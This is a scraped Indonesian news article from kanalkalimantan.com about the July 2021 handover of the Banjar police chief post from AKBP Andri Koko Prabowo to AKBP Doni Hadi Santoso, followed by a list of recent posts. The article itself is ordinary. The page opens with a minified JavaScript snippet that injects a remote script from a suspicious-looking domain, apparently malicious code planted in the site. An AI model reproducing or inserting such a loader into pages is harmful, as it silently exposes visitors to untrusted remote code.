(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Kenal Pamit Kapolres Banjar, Ini Ungkapan AKBP Andri Bertugas di Serambi Mekkah


KANALKALIMANTAN.COM, MARTAPURA – Menjabat sebagai Kepala Kepolisian Resort (Kapolres) Banjar sejak 11 Nopember 2019 hingga Juli 2021 (1 tahun 8 bulan), AKBP Andri Koko Prabowo resmi digantikan AKBP Doni Hadi Santoso.

AKBP Dono Hadi Santoso sebelumnya adalah Kapolres Kota Banjarbaru. Acara kenal pamit digelar di Mahligai Sultan Adam Martapura, Sabtu (31/7/2021) malam.

AKBP Andri Koko Prabowo mengaku saat dirinya berada di wilayah hukum Polres Banjar sebelum pandemi, hingga saat ini Kabupaten Banjar berada pada PPKM level 3.

“Martapura sangat memberikan kesan bagi saya, meski dengan suasana keterbatasan karena Covid -19, saya merasakan dan menikmati suasana religius kota ini,” akunya.

 

 

Baca juga: Lion Group Rumahkan Ribuan Karyawannya

Melalui program Subuh Keliling, ia merasakan bagaimana kota ini dijuluki sebagai kota Serambi Mekkah.

“Alhamdulillah di masa jabatan saya juga sempat melaksanakan pengamanan Haul Abah Guru Sekumpul, tentunya semua kenangan ini tak dapat dilupakan dan akan selalu saya ingat kemanapun saya pergi,” kenang AKBP Andri.

Sementara itu, Kapolres Banjar AKBP Doni Hadi Santoso mengatakan, hal pertama yang dilakukan adalah menyesuaikan situasi di Kabupaten Banjar dan menjaga silaturahim, kemudian menjaga koordinasi dengan stakeholder lain.

“Terkait Kabupaten Banjar saat ini PPKM level 3, kami akan bahu membahu dengan seluruh stakeholder, bagaimana caranya mencarikan formula, minimal tetap berada di level 3 dan maksimal diupayakan turun menjadi level 2,” bebernya.

Seluruh masyarakat Kabupaten Banjar dapat bekerjasama menjalankan semua kebijakan pemerintah.

“Diperlukan kesadaran dari masyarakat, karena semuanya tergantung pada masyarakat itu sendiri, jadi mari kita bersama sama menjaga Kabupaten Banjar,” ujar AKBP Doni.

Dilain pihak, Bupati Banjar H Saidi Mansyur mengapresiasi semua program yang telah dilaksanakan oleh AKBP Andri Koko Prabowo, telah banyak sumbangsih yang diberikan selama di Kabupaten Banjar, diantaranya ikut menyukseskan Pilkades Serentak.

“Kami mohon maaf sebesar besarnya dan selamat menjalankan tugas di tempat yang baru,” ucap Saidi Mansyur.

Bupati Banjar H Saidi Mansyur berkesempatan memberikan cinderamata kepada AKBP Andri Koko Prabowo dan istri. (kanalkalimantan.com/mcbanjar)

Reporter : mcbanjar
Editor : kk


Risa

Recent Posts

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

56 menit ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

2 jam ago

Nilai Posisi Waspada, Pemkab Kapuas Gelar Rakor SPI MCP dan LHKPN

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten (Pemkab) Kapuas melalui Inspektorat melaksanakan rapat koordinasi (Rakor) terkait… Read More

3 jam ago

LITERASI EMOSIONAL DI MEDIA SOSIAL: MENGELOLA EMOSI DAN INTERAKASI ONLINE

"WEBINAR INDONESIA MAKIN CAKAP DIGITAL" WILAYAH KALIMANTAN Read More

4 jam ago

Wabup Banjar Hadiri Haul Ke-68 KH Zainal Ilmi

KANALKALIMANTAN.COM, MARTAPURA - Wakil Bupati Banjar Habib Idrus Al Habsyi betbaur dengan ribuan orang menghadiri… Read More

5 jam ago

Simulasi Keadaan Darurat di Terminal BBM Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - PT Pertamina Patra Niaga Integrated Terminal Banjarmasin melakukan simulasi keadaan darurat bersama… Read More

15 jam ago

This website uses cookies.